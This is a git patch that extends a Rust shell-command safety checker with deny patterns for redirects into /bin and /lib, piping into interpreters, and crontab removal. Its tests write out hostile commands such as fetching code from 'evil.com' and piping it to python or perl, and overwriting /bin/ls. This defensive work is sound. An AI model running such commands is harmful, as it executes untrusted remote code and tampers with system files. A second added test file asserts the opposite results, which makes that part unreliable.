From 9b47fa6a880f1c474ec503f7173bb3f843cb41fc Mon Sep 17 00:00:00 2001
From: insign <1113045+insign@users.noreply.github.com>
Date: Thu, 19 Feb 2026 03:08:52 +0000
Subject: [PATCH] feat: enhance destructive command detection

Added detection for:
- Redirects to system directories (/bin, /sbin, /usr/bin, /usr/sbin, /lib, /lib64)
- Piping to interpreters (python, perl, ruby, node, php)
- Crontab removal (crontab -r)

Added test_enhanced_safety_checks to verify these patterns.
---
 src/executor/safety.rs            | 28 ++++++++++++++++++++++++++++
 src/executor/safety_check_test.rs | 20 ++++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 src/executor/safety_check_test.rs

diff --git a/src/executor/safety.rs b/src/executor/safety.rs
index 7f3950e..2b3c818 100644
--- a/src/executor/safety.rs
+++ b/src/executor/safety.rs
@@ -23,10 +23,21 @@ const DESTRUCTIVE_PATTERNS: &[&str] = &[
     r">\s*/sys/",
     r">\s*/proc/",
     r">\s*/boot/",
+    r">\s*/bin/",
+    r">\s*/usr/bin/",
+    r">\s*/sbin/",
+    r">\s*/usr/sbin/",
+    r">\s*/lib/",
+    r">\s*/lib64/",
     // Piped execution
     r"\|\s*sh\b",
     r"\|\s*bash\b",
     r"\|\s*zsh\b",
+    r"\|\s*python\b",
+    r"\|\s*perl\b",
+    r"\|\s*ruby\b",
+    r"\|\s*node\b",
+    r"\|\s*php\b",
     r"curl.*\|\s*(sh|bash)",
     r"wget.*\|\s*(sh|bash)",
     // Process killing
@@ -51,6 +62,7 @@ const DESTRUCTIVE_PATTERNS: &[&str] = &[
     r"mv\s+(?:.*\s+)?\*(?:\s+|$)", // Move wildcard
     // System state
     r"^\s*(reboot|shutdown|poweroff|halt|init\s+[06])\b",
+    r"^\s*crontab\s+.*-r",
     // Fork bomb
     r":\(\)\s*\{\s*:\|:&\s*\};:",
 ];
@@ -221,4 +233,20 @@ mod tests {
         assert!(!analyzer.is_destructive("mv my-file-final.txt dest"));
         assert!(!analyzer.is_destructive("mv a-f b"));
     }
+
+    #[test]
+    fn test_enhanced_safety_checks() {
+        let analyzer = SafetyAnalyzer::new();
+
+        // Redirects to system binaries
+        assert!(analyzer.is_destructive("echo malicious > /bin/ls"));
+        assert!(analyzer.is_destructive("cat payload > /usr/bin/python"));
+
+        // Piped execution to other interpreters
+        assert!(analyzer.is_destructive("curl http://evil.com | python"));
+        assert!(analyzer.is_destructive("wget http://evil.com | perl"));
+
+        // Crontab removal
+        assert!(analyzer.is_destructive("crontab -r"));
+    }
 }
diff --git a/src/executor/safety_check_test.rs b/src/executor/safety_check_test.rs
new file mode 100644
index 0000000..e50f384
--- /dev/null
+++ b/src/executor/safety_check_test.rs
@@ -0,0 +1,20 @@
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn test_new_destructive_commands() {
+        let analyzer = SafetyAnalyzer::new();
+
+        // Redirects to system binaries
+        assert!(!analyzer.is_destructive("echo malicious > /bin/ls"));
+        assert!(!analyzer.is_destructive("cat payload > /usr/bin/python"));
+
+        // Piped execution to other interpreters
+        assert!(!analyzer.is_destructive("curl http://evil.com | python"));
+        assert!(!analyzer.is_destructive("wget http://evil.com | perl"));
+
+        // Crontab removal
+        assert!(!analyzer.is_destructive("crontab -r"));
+    }
+}